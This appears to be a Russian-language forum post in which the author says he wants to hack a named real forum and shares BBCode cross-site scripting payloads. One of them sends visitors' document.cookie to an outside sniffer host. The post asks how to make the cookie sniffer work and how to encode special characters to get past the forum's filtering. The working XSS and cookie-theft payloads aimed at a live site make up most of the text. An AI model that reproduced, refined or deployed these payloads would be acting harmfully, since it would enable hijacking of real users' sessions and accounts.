Короче хочу ломануть вот этот форумчик _http://forum.polarnet.ru/ вот этот код Code: [HTML][URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial size=+7 onmouseover=alert(/Hello_from_WJ/) /]wj[/FONT][/url][/URL] даёт нам что-то типа Code: [HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj <FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 ">wj</FONT>" target="_blank">http://www.wj.com]wj <font face="Ar.../) /">wj</font></A></A> Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа Code: [HTML][URL=http://www.wj.com[url]http://www.wj.com]wj[FONT=Arial size=+7 style=background:url(javascript:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); /]wj [/FONT][/url][/URL] Нехрена нам не даёт, а именно в сорцах всё смотрится так Code: [HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj[FONT=Arial size=+7 style=background:url(javascript<B></B>:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); /]wj [/FONT]" target="_blank">http://www.wj.com]wj[FONT=Arial...]wj [/FONT</A> Вообщем ай нид хелп.
Усё нашёл эксплойт на форуме, вот этот здесь http://www.forum.antichat.ru/threadnav11693-1-10.html Тока теперь раскажите как шифровать эти спец символы, хочу свой снифак воткнуть.
